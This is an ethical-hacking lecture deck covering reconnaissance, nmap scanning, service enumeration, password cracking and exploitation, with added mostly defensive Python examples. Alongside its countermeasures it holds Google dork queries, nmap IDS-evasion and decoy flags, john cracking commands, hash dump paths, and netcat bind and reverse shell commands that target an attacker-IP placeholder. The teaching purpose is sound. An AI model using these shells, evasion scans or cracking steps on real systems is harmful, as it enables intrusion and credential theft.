Published by Eliza Dopkins. Modified over 9 years ago.
1
Dr. Igor Santos
2
What is Ethical Hacking?
Phases:
▪ Information Gathering
▪ Network Mapping & Scanning
▪ Password Attacks
▪ Service Enumeration
▪ Vulnerabilities Identification & Exploitation
3
What is Ethical Hacking?
4
A method to evaluate the security of a system, or of a network of systems, by simulating an intruder's attack
It shows the actual impact of a vulnerability through controlled tests
It searches for unknown vulnerabilities
5
Information level
▪ White Box
▪ Black Box
Social Engineering?
Physical Security?
Dangerous tests?
▪ Exploits
▪ DoS
▪ …
6
Information Gathering
7
Gather information about the target before the attack
▪ Without (too much) contact
▪ As much information as possible
The information can be very valuable in the future
More information = higher probability of success in the attack
8
Information we search for:
▪ Names and/or positions of workers
▪ E-mail addresses
▪ User names
▪ Public addresses, domains or URLs
▪ Used software and technologies
▪ Internal addresses or URLs
▪ Internal paths
▪ Data about the system configuration
9
▪ Client and supplier names
▪ Physical location
▪ Telephone number
▪ …
Iterative process: when information is found, new searches are performed
10
Sources
▪ Search engines
▪ DNS servers
▪ Whois servers
▪ Metadata
▪ Social networks
▪ P2P networks
▪ …
11
Passive methods: the target is not contacted directly
▪ Search engines
▪ Whois
▪ …
Active methods: they leave some trace on the target
▪ DNS zone transfer
▪ Web site mirroring
▪ …
12
Internet service registration (whois)
▪ Information about IP records and their maintenance
Search engines
▪ Gather public information from the company's and workers' web sites
13
DNS queries
▪ Identification of hosts by DNS querying
Web site analysis
▪ Intentionally published information that may pose a risk to security
14
New sources!!!
▪ Social networks
▪ Metadata
▪ P2P networks
▪ Job search websites
15
Google Hacking: searching Google for sensitive information, usually with malicious goals
Johnny Long, Google Hacking For Penetration Testers
http://www.hackersforcharity.org/ghdb/
▪ Not maintained
http://www.exploit-db.com/google-dorks/
▪ Continuation!!! (9 Nov. 2010)
Cheat-sheet: http://www.sans.org/mentor/GoogleCheatSheet.pdf
16
What to look for?
▪ Vulnerable applications (e.g.: inurl:eStore/index.cgi?)
▪ Error messages (e.g.: "Warning: mysql_query()" "invalid query")
▪ Files with sensitive information (e.g.: filetype:sql "insert into")
▪ Websites with private reports (e.g.: intitle:"Nessus Scan Report")
▪ Web server versions (e.g.: "Microsoft-IIS/* server at", intitle:index.of)
17
http://www.shodanhq.com/
A "different" search engine
It finds systems by performing searches based on their banner responses
▪ Computer search engine
Filters: http://www.shodanhq.com/help/filters
Examples:
▪ net:130.206.139.0/24
▪ port:22 country:ES
18
Netcraft (http://news.netcraft.com)
It shows the following information for a given domain:
▪ OS version
▪ Web server version
▪ Uptime
19
Countermeasures
Properly configure the "robots.txt" file
▪ This file tells search engines what they must NOT index
Periodically audit the web site with these techniques in order to check that there is no access to sensitive information
20
Who has a profile on Facebook or LinkedIn?
Do we know how to handle privacy in social networks?
Social Engineering: create a fake profile in order to obtain access to private profiles = lots of information!
Social network search engines
▪ http://www.123people.com/
▪ http://www.pipl.com/
21
Countermeasures
▪ Limit the presence in social networks
▪ Don't publish too much
▪ Don't publish automatically
▪ Don't accept every friendship request (we may not be the final victim, but an attack vector)
22
Hidden information inside a document
▪ Author
▪ Used application
▪ Date of creation
▪ Camera model (images)
▪ E-mail addresses
▪ …
It enhances the information present in a document
23
A tool that started as a metadata extractor and analyzer, and now is more than that:
▪ Document panel: searches several types of documents in Google, Bing and Exalead
▪ DNS Search panel: it uses different techniques to obtain more domain names
Countermeasures: Metashield Protector
▪ It cleans the metadata from documents
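The two slides above describe what document metadata leaks and the countermeasure of cleaning it. The following is an added example written for this page (it is not FOCA's or Metashield Protector's code) that builds a minimal, constructed .docx-style container in memory, reads the OOXML core properties that leak user names, internal domains and dates, and then blanks them the way a metadata-cleaning tool does. The user name and Windows domain in the sample are made up, and the container holds only the parts this example needs, not everything a real .docx contains.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# XML namespaces used by docProps/core.xml in OOXML (.docx/.xlsx/.pptx) files.
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
    "xsi": "http://www.w3.org/2001/XMLSchema-instance",
}
for prefix, uri in NS.items():
    ET.register_namespace(prefix, uri)  # keep readable prefixes when re-serializing

# Core properties that typically leak user names, internal domains and dates.
FIELDS = ["dc:creator", "cp:lastModifiedBy", "dcterms:created", "dcterms:modified"]

# Constructed sample core.xml: the account name and domain are invented for the demo.
SAMPLE_CORE_XML = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties
  xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
  xmlns:dc="http://purl.org/dc/elements/1.1/"
  xmlns:dcterms="http://purl.org/dc/terms/"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <dc:creator>jsmith</dc:creator>
  <cp:lastModifiedBy>CORP\\jsmith</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-11-09T10:00:00Z</dcterms:created>
</cp:coreProperties>"""


def build_sample_docx() -> bytes:
    """Build a minimal zip container with only the parts this demo needs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("docProps/core.xml", SAMPLE_CORE_XML)
        z.writestr("word/document.xml", b"<w:document/>")  # placeholder body part
    return buf.getvalue()


def extract_metadata(docx_bytes: bytes) -> dict:
    """Return the non-empty core properties found in docProps/core.xml."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("docProps/core.xml"))
    found = {}
    for tag in FIELDS:
        el = root.find(tag, NS)
        if el is not None and el.text:
            found[tag] = el.text
    return found


def scrub_metadata(docx_bytes: bytes) -> bytes:
    """Copy the container, blanking the leaking core properties on the way."""
    src = zipfile.ZipFile(io.BytesIO(docx_bytes))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            data = src.read(item.filename)
            if item.filename == "docProps/core.xml":
                root = ET.fromstring(data)
                for tag in FIELDS:
                    el = root.find(tag, NS)
                    if el is not None:
                        el.text = ""  # keep the element, drop its value
                data = ET.tostring(root, encoding="UTF-8", xml_declaration=True)
            dst.writestr(item, data)
    return out.getvalue()


def part_names(docx_bytes: bytes) -> list:
    """List the parts in the container (to check the scrub kept the document body)."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return z.namelist()


if __name__ == "__main__":
    original = build_sample_docx()
    print("before:", extract_metadata(original))
    print("after: ", extract_metadata(scrub_metadata(original)))
```

Running the block prints the three leaking properties first and an empty dictionary afterwards; the same extract-then-scrub pattern applies to any OOXML file, since they all carry core properties in docProps/core.xml.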
24
Network Mapping & Scanning
25
Several techniques
▪ Host discovery
▪ Port scanning
▪ IDS (Intrusion Detection System) evasion
▪ Service and OS identification (fingerprinting)
26
Nmap
Tool for network exploration and security auditing
nmap [Scan Type(s)] [Options] {target specification}
Options
▪ Scan type: -sS, -sX, -sU, …
▪ -p <ports>: ports to scan (separated by commas, or "-" for a range; to scan all of them, -p 0-65535)
27
Zenmap
▪ Front-end for nmap
▪ It draws a network map with the results
▪ Predefined scans
28
Manual: http://nmap.org/man/es/man-briefoptions.html
Cheat sheet: http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf
Book: http://nmap.org/book/
29
Identify online systems
▪ First step for network mapping
Classic method using ping
▪ ICMP echo request
▪ Alive systems respond with an ICMP echo reply
It is also possible to send TCP packets and wait for the response of the online hosts
ARP ping in local networks
30
Nmap ping (-sP)
▪ ICMP echo request & ICMP timestamp request
▪ TCP ACK packet to port 80
▪ TCP SYN packet to port 443
Example: nmap -sP 192.168.1.1
31
One of the most widespread hacking techniques
▪ Nmap in Hollywood: http://nmap.org/movies.html
A computer runs several services that listen on TCP/UDP ports
By means of scanning, we can locate open ports
32
TCP Connect scan
▪ A TCP connection is established with the destination port (three-way handshake)
▪ A very reliable method to determine the port state
▪ Simple and easy to detect: it generates too much noise
nmap -sT -p <ports> <target>
33
Open port
34
Closed port
35
Filtered port
36
SYN scan
▪ If a listening port is found, the full connection is not established: a RST is sent to tear it down
▪ Because the three-way handshake is not completed, many systems don't log the connection attempt
▪ An IDS can easily detect it
▪ Quick and reliable
nmap -sS -p <ports> <target>
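The connect-scan and SYN-scan slides above note that a SYN scan often escapes the target's own logs but is easy for an IDS to spot. The following added example (written for this page, not part of nmap or any IDS product) shows the detection side: it parses a handful of constructed firewall-style connection-attempt lines and raises an alert for any source that touches many distinct destination ports within a short window, which is the signature both scan types leave on the network even when the host never logs a completed connection. The log format, addresses, window and threshold are all assumptions made for the demo.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format (hypothetical firewall / flow export): one attempt per line.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
    r"proto=(?P<proto>tcp|udp) dport=(?P<dport>\d+) flags=(?P<flags>\S*)$"
)

# Constructed sample: 10.0.0.5 probes ten ports one second apart (SYN only, as a
# SYN scan would), 10.0.0.7 is an ordinary web client, and one line is garbage.
SAMPLE_LOG = [
    f"2010-11-09T10:00:{i:02d} src=10.0.0.5 dst=192.168.1.10 proto=tcp dport={p} flags=S"
    for i, p in enumerate([21, 22, 23, 25, 80, 110, 143, 443, 445, 3389])
] + [
    "2010-11-09T10:00:03 src=10.0.0.7 dst=192.168.1.10 proto=tcp dport=80 flags=S",
    "2010-11-09T10:00:03 src=10.0.0.7 dst=192.168.1.10 proto=tcp dport=80 flags=A",
    "2010-11-09T10:00:04 src=10.0.0.7 dst=192.168.1.10 proto=tcp dport=443 flags=S",
    "this line is malformed and must be skipped",
]


def parse_line(line: str):
    """Return a record dict for a well-formed line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    rec["dport"] = int(rec["dport"])
    return rec


def detect_port_scans(lines, window=timedelta(seconds=10), threshold=8) -> dict:
    """Flag every source that hits >= threshold distinct (dst, port) pairs inside window.

    A half-open SYN scan and a full connect scan look the same here: both produce
    one flags=S attempt per probed port, so the detector keys on port spread, not
    on whether the handshake completed. syn_only is True when no probe went past
    the initial SYN, a hint that the source never intended to talk to the service.
    """
    recent = defaultdict(deque)  # src -> deque of (ts, (dst, dport), flags)
    alerts = {}
    for rec in filter(None, map(parse_line, lines)):
        q = recent[rec["src"]]
        q.append((rec["ts"], (rec["dst"], rec["dport"]), rec["flags"]))
        while q and rec["ts"] - q[0][0] > window:
            q.popleft()  # slide the window forward
        targets = {t for _, t, _ in q}
        if len(targets) >= threshold:
            alerts[rec["src"]] = {
                "distinct_targets": len(targets),
                "syn_only": all(f == "S" for _, _, f in q),
                "first": q[0][0].isoformat(),
                "last": rec["ts"].isoformat(),
            }
    return alerts


if __name__ == "__main__":
    for src, info in detect_port_scans(SAMPLE_LOG).items():
        print(f"possible port scan from {src}: {info}")
```

The threshold and window are the tuning knobs: too low and a busy monitoring host trips it, too high and a slow scan spread over minutes slips underneath, which is exactly the trade-off the timing options of a scanner are designed to exploit.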
37
Open port
38
Closed port
39
Filtered port
40
UDP is a connectionless protocol
▪ Closed ports return an "ICMP destination unreachable" packet
▪ If ICMP traffic is filtered, no responses are received for the closed ports
▪ The port state cannot be determined conclusively
nmap -sU -p <ports> <target>
41
Open/Filtered port
42
Closed port
43
Techniques to avoid IDS/IPS
Use of fragmented packets
▪ Distribution of an IP packet across several data blocks
▪ nmap -sS -f -p <ports> <target>
Spoofing of source IPs to emulate multiple attackers
▪ Hiding our own IP (attacker)
▪ nmap -sS -D <decoy1,decoy2,...> -p <ports> <target>
44
Service fingerprinting
▪ Identification of the service listening on a TCP/UDP port
▪ nmap -sV -p <ports> <target>
O.S. fingerprinting
▪ Identification of the operating system
▪ nmap -O <target>
45
▪ Disable unnecessary services
▪ Close ports
▪ Firewall / IDS / IPS
▪ ICMP traffic filtering
46
Enumeration
47
Get information through a network service
What information?
▪ System user names
▪ Email addresses
▪ Other systems
▪ ...
48
Services
▪ FTP: anonymous / ftp-user-enum
▪ TFTP: without authentication!
▪ SMTP: VRFY and EXPN commands → smtpenum
▪ DNS: direct/reverse lookup and zone transfer
▪ HTTP: banner grabbing
▪ RPC: edump, rpcdump, rpcinfo
▪ NETBIOS: samrdump
▪ SNMP: snmpwalk, snmpcheck
▪ LDAP: brute force by means of the Guest user
49
▪ Keep the services updated
▪ Disable unnecessary services
50
Password Attacks
51
Some or all of the data necessary to authenticate is unknown
▪ User (if the Information Gathering phase has been done correctly, we will have several system users)
▪ Password
The password file is known, but it is encrypted
▪ Words are tested until the correct one is found
52
Systems store a password hash
▪ They do not store users' passwords in clear
▪ One-way encryption function
▪ It cannot be decrypted
▪ http://en.wikipedia.org/wiki/Cryptographic_hash_function
53
During a pentest we will collect password hashes
▪ Bad configurations
▪ Successful intrusion
With administrative permission it is possible to dump the hashes of the system users' passwords
▪ Windows -> SAM
▪ Unix -> /etc/passwd, /etc/shadow
54
Dictionary
▪ It is based on a list of user names or passwords
▪ Common words
▪ Terms related to the audited organization
▪ Try until the right one is found: it should be on the list!
▪ Success depends on how good and/or extensive the dictionary is
▪ /pentest/passwords/wordlists
55
Hybrid
▪ It uses a dictionary, but variations are also introduced
Examples
▪ Try dictionary words in lowercase and uppercase
▪ A is changed to 4, S to 5, E to 3, ...
56
Brute Force
▪ Usernames or passwords are generated within a length range and a given character set
▪ E.g. max 8 characters [A-Za-z]
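Slides 52 to 56 above explain that systems store one-way hashes and that dictionary, hybrid and brute-force attacks recover passwords by hashing guesses until one matches. The following added example (written for this page, not code from John the Ripper or any tool the slides name) puts the three ideas together from an auditor's side: it runs a dictionary plus the slide's hybrid rules (case changes and A→4, S→5, E→3, with O→0 added as one more rule) against a constructed dump of unsalted SHA-1 hashes, computes the size of the brute-force keyspace for the slide's "8 characters, [A-Za-z]" case, and then shows the storage-side countermeasure: a per-user random salt with a slow key-derivation function (PBKDF2), which makes one precomputed table useless against every account. The user names, passwords and wordlist are all invented for the demo.

```python
import hashlib
import hmac
import os


def sha1_hex(pw: str) -> str:
    """Unsalted SHA-1, standing in for the weak legacy scheme of a dumped hash file."""
    return hashlib.sha1(pw.encode()).hexdigest()


# Constructed dump: user -> unsalted hash. The passwords are chosen for the demo.
DUMPED_HASHES = {
    "alice": sha1_hex("Summer2010"),     # dictionary word with a case rule
    "bob":   sha1_hex("p455w0rd"),       # dictionary word with leet substitutions
    "carol": sha1_hex("Xq7!vR2#mL9z"),   # not derivable from the wordlist
}

# Constructed small dictionary.
WORDLIST = ["password", "summer2010", "welcome", "letmein"]

# Hybrid rule from the slide (A->4, S->5, E->3) plus O->0 as an extra rule.
LEET = str.maketrans({"a": "4", "s": "5", "e": "3", "o": "0"})


def hybrid_candidates(word: str):
    """Yield the base word in three cases, each with and without leet substitutions."""
    seen = set()
    for base in (word.lower(), word.upper(), word.capitalize()):
        for cand in (base, base.translate(LEET)):
            if cand not in seen:
                seen.add(cand)
                yield cand


def audit_dictionary(dumped: dict, wordlist) -> dict:
    """Return {user: recovered_password} for every hash matched by the dictionary+rules.

    Because the hashes are unsalted, every candidate is hashed once and reused
    against all accounts: the cost of the attack does not grow with the user count.
    """
    table = {}
    for word in wordlist:
        for cand in hybrid_candidates(word):
            table.setdefault(sha1_hex(cand), cand)
    return {user: table[h] for user, h in dumped.items() if h in table}


def keyspace_size(charset_len: int, max_len: int) -> int:
    """Number of candidates a brute-force run must cover for lengths 1..max_len."""
    return sum(charset_len ** k for k in range(1, max_len + 1))


# Countermeasure on the storage side: random per-user salt + slow KDF.
def hash_password(pw: str, salt: bytes = None, iterations: int = 100_000):
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, iterations)
    return salt, iterations, dk


def verify_password(pw: str, salt: bytes, iterations: int, dk: bytes) -> bool:
    cand = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, iterations)
    return hmac.compare_digest(cand, dk)  # constant-time comparison


if __name__ == "__main__":
    print("recovered:", audit_dictionary(DUMPED_HASHES, WORDLIST))
    print("[A-Za-z] up to 8 chars:", keyspace_size(52, 8), "candidates")
    salt, it, dk = hash_password("Summer2010")
    print("salted verify:", verify_password("Summer2010", salt, it, dk))
```

Two accounts fall to the dictionary with rules; carol's does not, and against salted PBKDF2 the same wordlist would have to be re-hashed per user at 100,000 iterations per guess, which is the whole point of the countermeasure.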
57
Password cracking tool
▪ Able to break several algorithms: DES, MD5, SHA-1, LM (LAN Manager), ...
▪ You can save a session for later cracking
58
Single mode
▪ Quick test
▪ Difficult to succeed
▪ It uses typical passwords and some variations
john --single <hashfile>
59
Wordlist mode
▪ It tests with a dictionary file
▪ Quick
▪ Hybrid attack: --rules
john --wordlist=<dictionary> <hashfile>
Dictionaries: /pentest/passwords/wordlists/
60
Incremental mode
It tries all possible combinations of passwords (brute force)
▪ Only letters (--incremental:alpha)
▪ Only numbers (--incremental:digits)
▪ Letters, numbers and some special characters (--incremental:lanman)
▪ All characters (--incremental:all)
john --incremental:[mode] <hashfile>
61
Show cracked hashes
john --show /etc/shadow
62
Shoulder surfing
Social Engineering
Sniffing
▪ Capture the session logins
Physical access
▪ Bypass -> Kon-Boot
▪ Password cracking: Ophcrack live CD (Rainbow Tables)
63
Vulnerabilities Identification & Exploitation
64
Terminology
▪ Vulnerability
▪ Exploit (client-side, server-side, …)
▪ 0-day exploit
▪ Payload
▪ CVE (Common Vulnerabilities and Exposures): http://cve.mitre.org/
65
Lots of vulnerability types:
▪ Configuration (not design)
▪ Input validation
▪ Directory traversal
▪ Command injection
▪ SQL injection
▪ Cross-site scripting (XSS)
▪ Buffer overflow
▪ …
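The slide above lists vulnerability classes without detail; the entry given as "Directory Jump" is what is usually called directory (path) traversal, an input-validation failure. The following added example, written for this page and not taken from any project, shows the bug beside its fix: a file-serving function that joins user input onto a base directory lets "../" (or an absolute path) escape that directory, while the hardened version resolves the final path and refuses anything outside the base. The temporary directory tree, file names and contents are constructed for the demo.

```python
import os
import shutil
import tempfile


def build_demo_tree():
    """Create <root>/public/index.html (meant to be served) and <root>/secret.txt (not)."""
    root = tempfile.mkdtemp(prefix="traversal-demo-")
    public = os.path.join(root, "public")
    os.mkdir(public)
    with open(os.path.join(public, "index.html"), "wb") as f:
        f.write(b"<h1>hello</h1>")
    with open(os.path.join(root, "secret.txt"), "wb") as f:
        f.write(b"db password")  # constructed sensitive file outside the web root
    return root, public


def read_file_vulnerable(base_dir: str, user_path: str) -> bytes:
    """VULNERABLE: plain join means '../secret.txt' walks out of base_dir."""
    with open(os.path.join(base_dir, user_path), "rb") as f:
        return f.read()


def read_file_hardened(base_dir: str, user_path: str) -> bytes:
    """Resolve symlinks and '..' first, then require the result to stay under base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    # commonpath handles the absolute-path case too: join() discards base when
    # user_path is absolute, so the resolved target no longer starts with base.
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"path escapes base directory: {user_path!r}")
    with open(target, "rb") as f:
        return f.read()


def traversal_blocked(base_dir: str, user_path: str) -> bool:
    """True when the hardened reader refuses the path (used for checking)."""
    try:
        read_file_hardened(base_dir, user_path)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    root, public = build_demo_tree()
    try:
        print("vulnerable:", read_file_vulnerable(public, "../secret.txt"))
        print("hardened, normal file:", read_file_hardened(public, "index.html"))
        print("hardened, traversal blocked:", traversal_blocked(public, "../secret.txt"))
    finally:
        shutil.rmtree(root)
```

Checking the resolved path, rather than filtering the string for "..", is the robust form of the fix: encoded or redundant separators, symlinks and absolute paths are all normalised before the comparison instead of having to be enumerated in a deny-list.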
66
Vulnerability search
Security Focus
▪ http://www.securityfocus.com/vulnerabilities
National Vulnerability Database
▪ http://web.nvd.nist.gov/view/vuln/search
CERT
▪ http://cert.inteco.es/vulnSearch/Current_News/Vulnerabilities_1/vulnerability_search/?postAction=getVulns
Microsoft Security Bulletins
▪ http://www.microsoft.com/spain/technet/security/bulletin/ms10-oct.mspx
Scanners: Secunia, Nessus, etc.
67
Exploit search
Exploit Database
▪ Milw0rm continuation
▪ http://www.exploit-db.com/
Others
▪ http://www.securiteam.com/exploits
▪ http://securityvulns.com/exploits
▪ http://www.web-hack.ru/exploit
▪ http://tarantula.by.ru/localroot
68
Metasploit
Framework for vulnerability exploitation
It helps in the development of new exploits
It allows defining
▪ Which exploit is going to be used
▪ Which payload is going to be launched
▪ Meterpreter: advanced payload without disk access (DLL injection) → less forensic evidence
▪ How it is going to be encoded (avoiding IDS, etc.)
69
Maintaining the access: backdoors
Tiny Shell: Unix backdoor
Hydrogen: backdoor from Immunitysec
▪ It includes robust encryption and traffic hiding
Radmin: Windows backdoor
▪ A remote-desktop-like connection. Very easy to use and with a lot of functions
70
Netcat: it can be used as a backdoor
▪ Victim (server): nc -lp 4444 -e cmd.exe
▪ Attacker (client): nc -vv <victim IP> 4444
Also "reverse shell":
▪ Attacker (client): nc -vvlp 4444
▪ Victim (server): nc -vv <attacker IP> 4444 -e cmd.exe
71
Images
▪ RTVE: http://www.flickr.com/photos/anonymous9000/2663311366
▪ The Matrix, Warner Bros.: http://www.flickr.com/photos/venosdale/4412225367
▪ http://www.flickr.com/photos/melancon/2283719035